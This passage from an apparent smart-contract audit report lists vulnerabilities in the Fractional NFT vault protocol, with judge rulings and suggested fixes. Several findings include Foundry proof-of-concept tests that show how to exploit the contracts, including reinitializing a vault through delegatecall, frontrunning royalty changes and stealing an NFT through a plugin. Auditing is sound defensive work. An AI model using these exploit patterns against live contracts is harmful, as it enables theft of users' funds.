0.01 wei.- Note that Alice can create a separated account whose balance for the fraction token is 0, to start the buyout
- No one is satisfied with the price (0.01 wei v/s 1 ether) and hence they will try to buy fraction tokens to reject the buyout
- Since there is not any fraction tokens locked in the
contract from Alice, other users do not need to do anything
- Since there is not any fraction tokens locked in the
- Alice invokes the
function- But before invoking the
function, Alice directly invokesIERC1155(token).safeTransferFrom
to send the rest 51 fraction token to theBuyout
contract - The
function will treat the buyout successful, since theIERC1155(token).balanceOf(address(this), id)
is bigger than 50% - The above two message calls happen in a single transaction, hence no one can front-run
- But before invoking the
- As a result
- Alice only paid 51 ether to get the locked NFTs whose value is 100 ether
- Other fraction holders get nothing (but they had paid for the fraction token before)
In short, a malicious users can buy any NFT by just paying half of the NFT's market price.
For each buyout, add a new field to record the amount of fraction tokens deposited by sellFractions
. And in the end
function, use the newly-added field to determine whether the buyout can be processed or not.
Ferret-san (Fractional) confirmed
HardlyDifficult (judge) commented:
Assets can be transferred in after a failed buyout to treat it as successful. Agree this is High risk.
Submitted by scaraven, also found by berndartmueller
In propose()
in Migration.sol, there is no check that the lengths of the selectors
and plugins
arrays are the same. This means that if a migration is successful, the install()
function in Vault.sol could revert beacuse we access an array out of bounds. This prevents a new vault being created thereby permanently locking assets inside the vault.
- User starts a new migration proposal where
selectors.length != plugins.length
- Enough users join proposal and the buyout bid starts
- Buyout bid is successful and migration starts with
- A new vault is cloned with
->vault.install(selectors, plugins)
- a. If
selectors.length > plugins.length
then we get an out of bounds error and transaction reverts
b. Ifselectors.length < plugins.length
then the excess values inplugins
is ignored which is tolerable - In scenario a., the migration fails and a new migration cannot start so assets in the vault are permanently locked
This may seem quite circumstantial as this problem only occurs if a user specifies selectors
and plugins
wrongly however it is very easy for an attacker to perform this maliciously with no cost on their behalf, it is highly unlikely that users will be able to spot a malicious migration.
VS Code
Consider adding a check in propose()
to make sure that the lengths match i.e.
function propose(
address _vault,
address[] calldata _modules,
address[] calldata _plugins,
bytes4[] calldata _selectors,
uint256 _newFractionSupply,
uint256 _targetPrice
) external {
// @Audit Make sure that selectors and plugins match
require(_selectors.length == _plugins.length, "Plugin lengths do not match");
// Reverts if address is not a registered vault
(, uint256 id) = IVaultRegistry(registry).vaultToToken(_vault);
if (id == 0) revert NotVault(_vault);
// Reverts if buyout state is not inactive
(, , State current, , , ) = IBuyout(buyout).buyoutInfo(_vault);
State required = State.INACTIVE;
if (current != required) revert IBuyout.InvalidState(required, current);
// Initializes migration proposal info
Proposal storage proposal = migrationInfo[_vault][++nextId];
proposal.startTime = block.timestamp;
proposal.targetPrice = _targetPrice;
proposal.modules = _modules;
proposal.plugins = _plugins;
proposal.selectors = _selectors;
proposal.oldFractionSupply = IVaultRegistry(registry).totalSupply(
proposal.newFractionSupply = _newFractionSupply;
Additionally, I would suggest adding such a check in the install()
function as this may prevent similiar problems if new modules are added.
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
A misconfiguration of a migration can result in permanently locked up funds. Agree with High risk here.
Submitted by kenzo
The leave
function allows to leave a proposal even if the proposal has been committed and failed.
This makes it a (probably unintended) duplicate functionality of withdrawContributions
, which is the function that should be used to withdraw failed contributions.
User assets might be lost:
When withdrawing assets from a failed migration, users should get back a different amount of assets, according to the buyout auction result. (I detailed this in another issue - "Migration::withdrawContribution falsely assumes that user should get exactly his original contribution back").
But when withdrawing assets from a proposal that has not been committed, users should get back their original amount of assets, as that has not changed.
Therefore, if leave
does not check if the proposal has been committed, users could call leave
instead of withdrawContribution
and get back a different amounts of assets than they deserve, on the expense of other users.
The leave
function does not check anywhere whether proposal.isCommited == true
Therefore, if a user calls it after a proposal has been committed and failed, it will continue to send him his original contribution back, instead of sending him the adjusted amount that has been returned from Buyout.
Revert in leave
if proposal.isCommited == true
You might be also able to merge the functionality of leave
and withdrawContribution
, but that depends on how you will implement the fix for withdrawContribution
Ferret-san (Fractional) confirmed
HardlyDifficult (judge) commented:
Users can withdraw more than expected after a failed proposal, which leads to a deficit and loss of assets for others. Agree with High risk.
Submitted by byterocket, also found by 242, _141345_, 0x1f8b, ACai, ayeslick, berndartmueller, BradMoon, cccz, Chom, giovannidisiena, infosec_us_team, Lambda, minhtrng, nine9, oyc_109, PwnedNoMore, reassor, scaraven, slywaters, sseefried, tofunmi, Twpony, and unforgiven
The Vault#execute
function calls a target contract's function via delegatecall
if the caller is either the owner of the Vault or the target contract is part of a merkle tree, indicating a permission to call the target contract.
// Check that the caller is either a module with permission to call or the owner.
if (!MerkleProof.verify(_proof, merkleRoot, leaf)) {
if (msg.sender != owner)
revert NotAuthorized(msg.sender, _target, selector);
(See Vault#execute)
If the checks succeed, the internal _execute()
function is used to execute the call via delegatecall
s have to be used with caution because the contract being called is using the caller's contract storage, i.e. the callee contract can alter the caller's contract state (for more info, see Solidity docs).
The developers seem to be aware of the danger that the callee contract is able to overtake the Vaults ownership, by changing the Vaults owner
variable, as the owner
is cached before the delegatecall
and afterwards checked that the variable did not change:
// ...
address owner_ = owner;
// ...
(success, response) = _target.delegatecall{gas:stipend}(_data);
if (owner_ != owner) revert OwnerChanged(owner_, owner);
// ...
(See Vault#_execute)
However, changing the owner
variable is not the only way the callee contract is able to overtake the Vaults ownership. If the nonce
variable is re-set to 0
, the Vault's init
function becomes callable again, granting ownership to the caller:
function init() external {
if (nonce != 0) revert Initialized(owner, msg.sender, nonce);
nonce = 1;
owner = msg.sender;
(See Vault#init)
Note that other storage variables (i.e. merkleRoot
and methods
) could also be altered, but this would not lead to a loss in ownership, i.e. the project could re-set the variables.
Nevertheless, a contract trying, due to being malicious or faulty, to change the Vaults ownership first needs to be permissioned by the owner by adding it to the merkle tree. Otherwise, the contract can not be called.
Due to the fact that the owner
variable check is included, meaning the project rates operational management already as being error-prone, and the high number of security issues in connection to faulty usage of delegatecall
, the severity is rated as MEDIUM (HIGH impact with a LOW likelihood).
Add the following code to the test/Vault.t.sol
file and run forge test --match-test "testExecuteNoRevertIfReinitialized" -vvvv
If the test succeeds, the Vault got re-initialized due to a delegatecall
altering the Vault's nonce
// Inside contract VaultTest.
function testExecuteNoRevertIfReinitialized() public {
vaultProxy.init(); // address(this) is owner
HackyTargetContract targetContract = new HackyTargetContract();
bytes32[] memory proof = new bytes32[](1);
bytes memory data = abi.encodeCall(
// Note that the call does NOT revert.
vaultProxy.execute(address(targetContract), data, proof);
// Note that the Vault can now be re-initialized as the execute
// call above set the Vault's nonce to zero.
assertEq(vaultProxy.owner(), address(1));
// Outside contract VaultTest.
contract HackyTargetContract {
address public gap_owner;
bytes32 public gap_merkleRoot;
uint256 public nonce;
function changeNonce() public {
nonce = 0;
Check the nonce
variable before and after the delegatecall
inside the _execute()
function as well, e.g.:
address owner_ = owner;
uint256 nonce_ = nonce;
// Execute delegatecall
if (owner_ != owner || nonce_ != nonce) {
revert InvalidStateChange();
// ...
mehtaculous (Fractional) confirmed
HardlyDifficult (judge) commented:
Due to the use of delegate call,
and/or the fallback function could lead to changing the proxy's storage or even self destructing the proxy instance. If this were to happen, users funds could be put at risk. These attacks are predicated on the current vault owner to maliciously or unintentionally directly call or approve the calling of a malicious plugin -- because of this, I agree with the warden here that this is a Medium risk issue.
Submitted by 0xNineDec, also found by 0x1f8b, infosec_us_team, kenzo, pashov, and xiaoming90
Each vault owner can manage freely the creation and deletion of plugins at any time if the vault was deployed by calling VaultRegistry.createFor()
. An owner can simply overwrite a current plugin selector with a new address and change the implementation of that plugin at any time. This can be used to frontrun others and change the logic of a call before it is mined.
This strategy can also be used to bypass the need to uninstall a plugin by overwriting a currently installed one with a different implementation without needing to first remove the old plugin and then install the new one. This can be made just by installing a selector that collides with a previously installed plugin and change the address that is pointing that selector.
There are two scenarios both relying on the fact that plugins can be overwritten which may lead to confusion in one case and to a malicious call in the other one.
A user can deploy a vault owner and install more than one plugin which selectors are the same. This will make that the last plugin address of the array will be pointed as the implementation of that plugin and the other ones will be overwritten. The whole installation process will emit an event containing the same selectors but different addresses which may be deceiving. Users that are not aware on how mapping data can be overwritten can be deceived because of this process.
function test_canDeployWithCollidingSelector() public {
// Getting the colliding selectors that point to different implementations.
bytes4 selectorOne = bytes4(keccak256(bytes("func_2093253501(bytes)")));
bytes4 selectorTwo = bytes4(keccak256(bytes("transfer(address,uint256)")));
bytes4[] memory collidingSelectors = new bytes4[](2);
address[] memory nonCollidingPlugins = new address[](2);
collidingSelectors[0] = selectorOne;
nonCollidingPlugins[0] = address(0xdead1);
collidingSelectors[1] = selectorTwo;
nonCollidingPlugins[1] = address(0xdead2);
// Deploying a vault
vault = alice.registry.createFor(
token = registry.fNFT();
setUpFERC1155(alice, token);
assertEq(IVault(vault).owner(), alice.addr);
assertEq(fERC1155.controller(), address(this));
// Both selectors point to the same address of implementation.
assertEq(IVault(vault).methods(selectorOne), address(0xdead2));
assertEq(IVault(vault).methods(selectorTwo), address(0xdead2));
A malicious vault owner can deploy a vault with a legit plugin that other users will call on a regular basis. The owner can develop a malicious plugin implementation, wait until there is a transaction that is targeting that plugin and frontrun it overwriting the plugin address by using the same selector. The new implementation can have unintended behavior for that user. If the owner is even more decided to continue doing this, he can backrun the transaction with another call setting the plugin address back to the legit implementation.
function test_canOverwritePlugin() public {
// Generating the colliding selectors
bytes4 selectorOne = bytes4(keccak256(bytes("collate_propagate_storage(bytes16)")));
bytes4 selectorTwo = bytes4(keccak256(bytes("burn(uint256)")));
bytes4[] memory collidingSelectors = new bytes4[](1);
address[] memory nonCollidingPlugins = new address[](1);
collidingSelectors[0] = selectorOne;
nonCollidingPlugins[0] = address(0xdead1);
// Deploying a vault
vault = alice.registry.createFor(
token = registry.fNFT();
setUpFERC1155(alice, token);
assertEq(IVault(vault).owner(), alice.addr);
assertEq(fERC1155.controller(), address(this));
// Checking that the selector one was properly installed and that points to 0xdead1
assertEq(IVault(vault).methods(selectorOne), address(0xdead1));
// At any time the owner will be able to overwrite the plugin by clashing with the existing one.
// this can be used to frontrun a call that targets selectorOne and modify its implementation.
bytes4[] memory clashingSelector = new bytes4[](1);
address[] memory newPluginAddress = new address[](1);
clashingSelector[0] = selectorTwo; // The one declared before.
newPluginAddress[0] = address(0xdead2);
IVault(vault).install(clashingSelector, newPluginAddress);
// Checking that the selector was indeed overwritten and now is pointing to 0xdead2
assertEq(IVault(vault).methods(selectorOne), address(0xdead2));
assertEq(IVault(vault).methods(selectorTwo), address(0xdead2)); // Redundant assertion.
// Also, there is no need to have a clashing function with other name.
// It is just enough to use the same function name as before with a new address.
clashingSelector[0] = selectorOne;
newPluginAddress[0] = address(0xdead3);
IVault(vault).install(clashingSelector, newPluginAddress);
assertEq(IVault(vault).methods(selectorOne), address(0xdead3));
assertEq(IVault(vault).methods(selectorTwo), address(0xdead3));
First of all, it is important to unify the criteria related on which are the entry points for a user to deploy a vault. Having different functions that lead to distinct access control roles within a deployed vault is potentially an issue (as shown before).
Also, regarding plugin installation it is important to check if the plugin that is willing to be installed is not overwriting the methods
mapping (in other words, checking if methods(selector)
is empty in order to perform the installation) and if plugins are not intended to work as emergency functions that need to be injected into a vault quickly, I would consider timelocking the process of plugin installation.
mehtaculous (Fractional) confirmed
HardlyDifficult (judge) commented:
Similar to #487 the concern here is about potentially malicious plugins. Here the concern is focused around changing the implementation logic vs modifying proxy storage presumed to be immutable by plugins. The way these concerns are addressed by differ.
Due to this concern there is a lot of trust placed in the vault owner. This is the same level of trust that any upgradeable contract requires -- however a unique consideration here is that normally upgradeable contracts place trust in a platform admin while these vaults are more general purpose. The suggestion above of adding a timelock helps to mitigate this concern, and checking for signature dupes could help to prevent user error. Additionally an allow list of plugins managed by the platform or DAO could be considered.
Due to the nuances above, I'm inclined to agree with the warden here that it's a Medium risk issue.
Submitted by 0xNineDec, also found by Franfran, neumo, oyc_109, pashov, and Ruhum
The secondary sales of a specific FERC1155
token can be charged with a certain amount of fees established by the controller of the FERC1155
. Those royalties are meant to be sent to a receiver according to the current implementation. Currently the protocol intends users to deploy vaults via BaseVault.deployVault()
which further calls VaultRegistry.create()
that uses the currently deployed fNFT
instance which it is controlled by the protocol itself.
However, there is other path that allows users deploying a vault where they are also the controllers of the fNFT
instance. This allows users to take control over how are the royalty fees changed. A user can easily change maliciously the amount of royalties (which are also uncapped) and steal a considerable (even the whole) amount of FERC1155
In order to illustrate this, we will conduct a hypothetical scenario where Alice is a malicious vault owner that deploys her vault by directly calling VaultRegistry.createCollectionFor()
, bypassing the need to call BaseVault.deployVault()
- Alice creates a vault to fractionalize a pricy asset with the
containing theMinter
module by callingVaultRegistry.createCollectionFor()
. She is now owner ofToken
. - She mints an amount of
and starts to distribute them among the community, and callsToken.setRoyalties()
setting the royalties for the secondary market at 1% (in order to incentivize and grow a secondary market). - A few periods later once the secondary market of that token acquired considerable momentum, Alice scans the mempool and decides to frontrun Bob (who was performing a big transfer) and steals the 100% of payment.
As a result of this process, Bob transferred the token to the buyer and received no payment in exchange and Alice got her hands on the whole payment.
It is showcased on the following code that Alice has control over how the fees are modified and when.
function test_CanFrontrunRoyalties() public {
(vault, token) = alice.registry.createCollectionFor(
assertEq(IVault(vault).owner(), address(registry));
assertEq(IFERC1155(token).controller(), alice.addr);
// Supposing that Alice added herself a minter permission within the merkleRoot
// that allows her to call Supply.mint(), she will be able to mint tokens.
// A few days pass and now the tokens are distributed across the community.
uint256 currentId = 1; // Supposed assigned tokenId.
uint256 maxPercentage = 100;
uint256 initialPercentage = 1;
// Initially Alice sets royalties at 1% in order to incentive secondary market.
IFERC1155(token).setRoyalties(currentId, alice.addr, initialPercentage);
// Check that anyone but Alice can change the royalties.
IFERC1155(token).setRoyalties(currentId, bob.addr, maxPercentage);
// Here is where the attack starts.
// Frontruns a big transaction (in terms of ether counterpart).
IFERC1155(token).setRoyalties(currentId, alice.addr, maxPercentage);
uint256 salePriceInEther = 100 ether;
(address royaltyReceiver, uint256 calculatedRoyalties) = IFERC1155(token).royaltyInfo(currentId, salePriceInEther);
assertEq(royaltyReceiver, alice.addr);
assertEq(calculatedRoyalties, salePriceInEther * maxPercentage / 100);
// TX <====== sandwitched attacked transaction is mined
// Backruns taking back the royalties to what it was initially.
IFERC1155(token).setRoyalties(currentId, alice.addr, initialPercentage);
(royaltyReceiver, calculatedRoyalties) = IFERC1155(token).royaltyInfo(currentId, salePriceInEther);
assertEq(royaltyReceiver, alice.addr);
assertEq(calculatedRoyalties, salePriceInEther * initialPercentage / 100);
It is needed to define clearly how users are intended to deploy vaults under which privileges. The fact that a user can deploy a vault both from BaseVault
and VaultRegistry
having different privileges is an issue. If needed, the VaultRegistry
key functions can be set as internal and have specific callers within BaseVault
that control also the privileges of each creation in order to concentrate the vault creations within a single endpoint.
Also, it is extremely important to set a maximum cap for the royalties as soon as possible. Although this does not mitigate the fact that a malicious vault owner can frontrun others, it gives a maximum boundary. What will be a definitive solution is setting both a maximum cap for the royalties and timelock that function so that vault owners have to wait a certain amount of time before changing the royalties in order to bring predictability for the community.
aklatham (Fractional) disagreed with severity
HardlyDifficult (judge) decreased severity to Medium and commented:
Royalties can be set to any rate by the owner, resulting in an effective loss for users. I think this is a Medium risk because it requires a malicious owner to set an unreasonable value.
Submitted by 0x29A
The EIP-2981: NFT Royalty Standard implementation is incomplete, missing the implementation of function supportsInterface(bytes4 interfaceID) external view returns (bool);
from the EIP-165: Standard Interface Detection.
A marketplace that implemented royalties could check if the NFT has royalties, but if they don't, add the interface of ERC2981
on the _registerInterface
, the marketplace can't know if this NFT has royalties.
Like in solmate ERC1155.sol add the ERC2981
interfaceId on the FERC1155
function supportsInterface(bytes4 interfaceId) public view override returns (bool) {
super.supportsInterface(interfaceId) ||
interfaceId == 0x2a55205a; // ERC165 Interface ID for ERC2981
aklatham (Fractional) confirmed
HardlyDifficult (judge) commented:
The contract implements the ERC2981 getter but does not register it as a 165 interface. Agree with the warden that this is a Medium risk issue. This is a function of the protocol and it may not work with many external marketplaces because it does not yet follow the standard as expected.
[M-05] Buyout Module: redeem
ing before the update of totalSupply will make buyout's current state success
Submitted by zzzitron, also found by unforgiven
MED - a hypothetical attack path with stated assumptions, but external requirements.
Attacker can create a vault with successful buyout status and non zero supply. The attacker can sell the fractions and then simply withdraw the assets.
- Deploy
: it will deployVault and calls redeem when the minted FERC1155 token is received - Calling
will start the process :baseVault.deployVault
- The baseVault will deploy vault and eventually mint the FERC1155 token to the
- When the FERC1155 is received, the
and set the state toSUCCESS
- After the redeem, the tatalSupply of the FERC1155 is set.
Now, the attacker can send in some assets to the vault and sell the fractions. Then, the attacker can withdraw any asset at any time from the vault using the buyout module, because the state is already SUCCESS
Note: An attacker can achieve the similar result with plugins. However, users might just refuse to buy tokens associated with such vaults and plugins. With the current issue, the user who is only looking at the vault will not notice this possibility unless they also check the status in the buyout module for the vault.
// FERC1155.sol::mint
// totalSupply is updated after _mint
// _mint contains out going call if the `_to` address's codesize is non zero
// Mitigation idea: update totalSupply before _mint
79 function mint(
80 address _to,
81 uint256 _id,
82 uint256 _amount,
83 bytes memory _data
84 ) external onlyRegistry {
85 _mint(_to, _id, _amount, _data);
86 totalSupply[_id] += _amount;
87 }
Update totalSupply
before _mint
stevennevins (Fractional) disagreed with severity
HardlyDifficult (judge) commented:
Since totalSupply is updated after an external call, a vault can be created with an incorrect buyout status. Agree that this is Medium risk.
Submitted by Lambda, also found by 0x29A
When proposal.totalFractions
is equal to the total supply (meaning that all token holders want to participate in a migration), there is a division by zero in _calculateTotal
In contrast to a buyout, where it does not make sense to initiate a buyout if all tokens are held (because there is a dedicated method for that), it does make sense to have a migration that all token holders join. Therefore, this case should be handled.
--- a/test/Migration.t.sol
+++ b/test/Migration.t.sol
@@ -238,7 +238,7 @@ contract MigrationTest is TestUtil {
// Bob joins the proposal
bob.migrationModule.join{value: 1 ether}(vault, 1, HALF_SUPPLY);
// Alice joins the proposal
- alice.migrationModule.join{value: 1 ether}(vault, 1, 1000);
+ alice.migrationModule.join{value: 1 ether}(vault, 1, HALF_SUPPLY);
vm.warp(proposalPeriod + 1);
// bob calls commit to kickoff the buyout process
In such a case, redeem
can be used instead of starting a buyout.
Ferret-san (Fractional) confirmed
HardlyDifficult (judge) commented:
When a migration is supported by all fractions, it fails with a div by 0 error. Agree with severity.
Submitted by 0xA5DF
In the buyout module when a buyout starts - the module stores the fractionPrice
, and when a user wants to buy/sell fractions the fractionPrice
is loaded from storage and based on that the module determines the price of the fractions.
The issue here is that the total supply might change between the time the buyout start till the buy/sell time, and the fractionPrice
stored in the module might not represent the real price anymore.
Currently there are no module that mint/burn supply at the time of buyout, but considering that Fractional is an extendible platform - Fractional might add one or a user might create his own module and create a vault with it. An example of an innocent module that can change the total supply - a split module, this hypothetical module may allow splitting a coin (multiplying the balance of all users by some factor, based on a vote by the holders, the same way QuickSwap did at March)). If that module is used in the middle of the buyout, that fraction price would still be based on the old supply.
- Buyout proposer can end up paying the entire buyout price, but ending up with only part of the vault.
- Users may end up buying fractions for more than they're really worth (if they're unaware of the change in total supply).
- Users may end up getting a lower price than intended while selling their fractions (in case of a burn).
Consider the following scenario
- Alice creates a vault with a 'split' module
- Bob starts a buyout for the price of 1 ETH
- Alice runs the split modules twice (making the total supply 4 times the original supply) and then sells 25% of her fractions.
- Bob lost his 1 ETH and got in exchange only 25% of the fractions.
Here's a test (added to the test/Buyout.t.sol
file) demonstrating this scenario (test passes = the bug exists).
function testSplit_bug() public {
initializeBuyout(alice, bob, TOTAL_SUPPLY, 0, true);
// Bob proposes a buyout for 1 ether for the entire vault
uint buyoutPrice = 1 ether;
bob.buyoutModule.start{value: buyoutPrice}(vault);
// simulate a x4 split
// Alice is the only holder so we need to multiply only her balance x4
bytes memory data = abi.encodeCall(
(alice.addr, TOTAL_SUPPLY * 3)
address supply = baseVault.supply();
Vault(payable(vault)).execute(supply, data, new bytes32[](0));
// Alice now sells only 1/4 of the total supply
// (TOTAL_SUPPLY is now 1/4 of the actual total supply)
alice.buyoutModule.sellFractions(vault, TOTAL_SUPPLY);
// Alice got 1 ETH and still holds 3/4 of the vault's fractions
assertEq(getETHBalance(alice.addr), buyoutPrice + INITIAL_BALANCE);
assertEq(getFractionBalance(alice.addr), TOTAL_SUPPLY * 3);
Trying to create a proof for minting was too much time-consuming, so I just disabled the proof check in Vault.execute
in order to simulate the split:
// if (!MerkleProof.verify(_proof, merkleRoot, leaf)) {
// if (msg.sender != owner)
// revert NotAuthorized(msg.sender, _target, selector);
// }
Calculate fraction price at the time of buy/sell according to the current total supply: (Disclosure: this is based on a solution I made for a different bug).
- This can still cause an issue if a user is unaware of the new fraction price, and will be selling his fractions for less than expected. Therefore, you'd might want to revert if the total supply has changed, while adding functionality to update the lastTotalSupply - this way there's an event notifying about the fraction-price change before the user buys/sells.
diff --git a/src/interfaces/IBuyout.sol b/src/interfaces/IBuyout.sol
index 0e1c9eb..79beb71 100644
--- a/src/interfaces/IBuyout.sol
+++ b/src/interfaces/IBuyout.sol
@@ -20,7 +20,7 @@ struct Auction {
// Enum state of the buyout auction
State state;
// Price of fractional tokens
- uint256 fractionPrice;
+ uint256 buyoutPrice;
// Balance of ether in buyout pool
uint256 ethBalance;
// Total supply recorded before a buyout started
diff --git a/src/modules/Buyout.sol b/src/modules/Buyout.sol
index 1557233..d9a6935 100644
--- a/src/modules/Buyout.sol
+++ b/src/modules/Buyout.sol
@@ -63,10 +63,13 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
if (id == 0) revert NotVault(_vault);
// Reverts if auction state is not inactive
- (, , State current, , , ) = this.buyoutInfo(_vault);
+ (, , State current, , ,uint256 lastTotalSupply) = this.buyoutInfo(_vault);
State required = State.INACTIVE;
if (current != required) revert InvalidState(required, current);
+ if(totalSupply != lastTotalSupply){
+ // emit event / revert / whatever
+ }
// Gets total supply of fractional tokens for the vault
uint256 totalSupply = IVaultRegistry(registry).totalSupply(_vault);
// Gets total balance of fractional tokens owned by caller
@@ -85,14 +88,14 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
// @dev Reverts with division error if called with total supply of tokens
uint256 buyoutPrice = (msg.value * 100) /
(100 - ((depositAmount * 100) / totalSupply));
- uint256 fractionPrice = buyoutPrice / totalSupply;
+ uint256 fractionEstimatedPrice = buyoutPrice / totalSupply;
// Sets info mapping of the vault address to auction struct
buyoutInfo[_vault] = Auction(
- fractionPrice,
+ buyoutPrice,
@@ -102,7 +105,7 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
- fractionPrice
+ fractionEstimatedPrice
@@ -115,8 +118,9 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
if (id == 0) revert NotVault(_vault);
- (uint256 startTime, , State current, uint256 fractionPrice, , ) = this
+ (uint256 startTime, , State current, uint256 buyoutPrice, , ) = this
+ uint256 totalSupply = IVaultRegistry(registry).totalSupply(_vault);
// Reverts if auction state is not live
State required = State.LIVE;
if (current != required) revert InvalidState(required, current);
@@ -135,7 +139,7 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
// Updates ether balance of pool
- uint256 ethAmount = fractionPrice * _amount;
+ uint256 ethAmount = buyoutPrice * _amount / totalSupply;
buyoutInfo[_vault].ethBalance -= ethAmount;
// Transfers ether amount to caller
_sendEthOrWeth(msg.sender, ethAmount);
@@ -153,16 +157,27 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
if (id == 0) revert NotVault(_vault);
// Reverts if auction state is not live
- (uint256 startTime, , State current, uint256 fractionPrice, , ) = this
+ (uint256 startTime, , State current, uint256 buyoutPrice, , uint256 lastTotalSupply ) = this
+ uint256 totalSupply = IVaultRegistry(registry).totalSupply(_vault);
+ if(totalSupply != lastTotalSupply){
+ // emit event / revert / whatever
+ }
State required = State.LIVE;
if (current != required) revert InvalidState(required, current);
// Reverts if current time is greater than end time of rejection period
uint256 endTime = startTime + REJECTION_PERIOD;
if (block.timestamp > endTime)
revert TimeExpired(block.timestamp, endTime);
+ uint256 price = (buyoutPrice * _amount) / totalSupply;
+ if (price * totalSupply < buyoutPrice * _amount){
+ price++;
+ }
// Reverts if payment amount does not equal price of fractional amount
- if (msg.value != fractionPrice * _amount) revert InvalidPayment();
+ if (msg.value != price) revert InvalidPayment();
@@ -272,6 +287,18 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
emit Cash(_vault, msg.sender, buyoutShare);
+ function updateSupply(address _vault) external{
+ (, , , uint256 buyoutPrice, , uint256 lastTotalSupply ) = this.buyoutInfo(_vault);
+ uint256 newTotalSupply = IVaultRegistry(registry).totalSupply(_vault);
+ uint256 newEstimatedFractionPrice = buyoutPrice / newTotalSupply;
+ if(newTotalSupply == lastTotalSupply){
+ revert SupplyHasntChanged();
+ }
+ this.buyoutInfo(_vault).lastTotalSupply = newTotalSupply;
+ emit TotalSupplyChanged(lastTotalSupply, newTotalSupply, newEstimatedFractionPrice);
+ }
HardlyDifficult (judge) decreased severity to QA and commented:
This is a valid suggestion to consider, improving robustness for future modules. Lowering risk and merging with the warden's QA report #524.
Reading Fractional's docs, it seems that they intend the vaults to use not only their modules, but also from other sources as long as they're trusted:
Additionally, users should only interact with Vaults that have been deployed using modules that they trust, since a malicious actor could deploy a Vault with malicious modules.
An innocent user or an attacker can be creating a split module, even getting it reviewed or audited and then creating a vault with it. Users would trust the vault, and when the bug is exploited it'd be the
module responsibility since it's the one that contains the bug (if your platform is intended to be extendable, then you should take into account any normal behavior that those extensions might have).
HardlyDifficult (judge) increased severity to Medium and commented:
Fair point. I'll reset this to Medium. Thanks
stevennevins (Fractional) commented:
Just to add, we're not certifying that the Buyout is safe in every context that it could be used in. In that statement we were trying to indicate that you can add modules outside of our curated set, but you would need to be aware of the trust assumptions with regards to both the individual module as well as their composition with others ie rapid inflationary mechanisms and a buyout. I recognize that we could have better handled the case of fraction supply changes during a buyout but inflation was outside of our initial scope for our curated launch. Thank you for reviewing our protocol and providing feedback it's greatly appreciated 🙏
Submitted by hansfriese, also found by 0x52 and codexploder
and Migration.leave()
can still work after unsucessful migration.
As I submitted with my high-risk finding "Migration.withdrawContribution()
might work unexpectedly after unsuccessful migration.", withdraw logic after unsuccessful migration is different from the initial leave()
logic and the withdrawal logic would be messy if users call join()
and leave()
after unsuccessful migration.
According to the explanation, join() and leave() functions must be called for 7 days before commition.
Currently, such a scenario is possible.
- Alice creates a new migration and commits after some joins.
- The migration ended unsuccessfully after 4 days.
- Then users can call
to withdraw their deposits but it wouldn't work properly because we should recalculate eth/fractional amounts with returned amounts after unsuccessful migration.
Solidity Visual Developer of VSCode
We should add some restrictions to join()
and leave()
functions so that users can call these functions for 7 days before the migration is committed.
We should add these conditions to join() and leave().
require(!migrationInfo[_vault][_proposalId].isCommited, "committed already");
require(block.timestamp <= proposal.startTime + PROPOSAL_PERIOD, "proposal over");
Ferret-san (Fractional) confirmed
Submitted by bbrho, also found by 0xNazgul, codexploder, infosec_us_team, s3cunda, Saintcode_, and zzzitron
Vault owners can install plugins via Vault.install()
, with calls to the installed plugins made through the vault's fallback function. Unlike the vault's external Vault.execute()
function, fallback()
imposes no checks on the permissions of the caller, assuming proper installation of the plugin by the owner at install time.
While this design seems intentional given NFTReceiver.sol
, it can lead to unintended vulnerabilities, like loss of vault NFTs, if the vault owner:
- Mistakenly installs a plugin not intended for unpermissioned use or installs a malicious plugin
- Is transferred vault ownership from a prior owner who misconfigured vault plugin installations
Example successful test similar to those from Vault.t.sol
The original vault owner installs a transfer target plugin, with selector ERC721TransferFrom
on the vault.
Ownership is then transferred to Bob, but the original owner uses the installed transfer plugin to steal
the NFT deposited in the vault and send it to Alice (without Bob's permission):
function testFallbackWithTransferPlugin() public {
bytes memory data = setUpExecute(alice);
// install transfer from on vault
address[] memory plugins = new address[](1);
bytes4[] memory selectors = new bytes4[](1);
plugins[0] = address(transferTarget);
selectors[0] = transferTarget.ERC721TransferFrom.selector;
vaultProxy.install(selectors, plugins);
// set bob as the owner
// check vault originally has the nft
assertEq(IERC721(erc721).balanceOf(vault), 1);
assertEq(IERC721(erc721).balanceOf(alice.addr), 0);
// execute the nft transfer via plugin with fallback
(bool success,) = address(vaultProxy).call(data);
// check this contract transferred nft out of vault to alice
// even after bob became owner
assertEq(IERC721(erc721).balanceOf(vault), 0);
assertEq(IERC721(erc721).balanceOf(alice.addr), 1);
Consider tracking which installed plugins might require permissions alongside the methods
mapping in storage. Potentially:
/// @notice Mapping of function selector to plugin address
mapping(bytes4 => address) public methods;
/// @notice Mapping of plugin address to whether permissions required
mapping(address => bool) public auths;
with auths[plugin]
used in fallback()
stevennevins (Fractional) confirmed
HardlyDifficult (judge) decreased severity to Medium and commented:
A malicious owner is given a lot of flexibility which can be abused to steal funds. I believe this is a Medium risk issue and not a High as it was reported as by many of the dupe submissions because the issues all originate from either a malicious owner or a faulty plugin.
See also #266 (comment)
I'm selecting this submission as the primary for including a coded POC, helping to understand one potential path of abuse this could lead to.
Submitted by hyh, also found by Lambda and Treasure-Seeker
As new total supply can be arbitrary, setting it significantly lower than current (say to 100 when it was 1e9 before) can be used to remove current minority shareholders, whose shares will end up being zero on a precision loss due to low new total supply value. This can go unnoticed as the effect is implementation based.
During Buyout the remaining shareholders are left with ETH funds based valuation and can sell the shares, but the minority shareholders that did contributed to the Migration, that could have other details favourable to them, may not realize that new shares will be calculated with the numerical truncation as a result of the new total supply introduction.
Setting the severity to Medium as this is a fund loss impact conditional on a user not understanding the particulars of the implementation.
Currently migrateFractions()
calculates new shares to be transferred for a user as a fraction of her contribution:
// Calculates share amount of fractions for the new vault based on the new total supply
uint256 newTotalSupply = IVaultRegistry(registry).totalSupply(newVault);
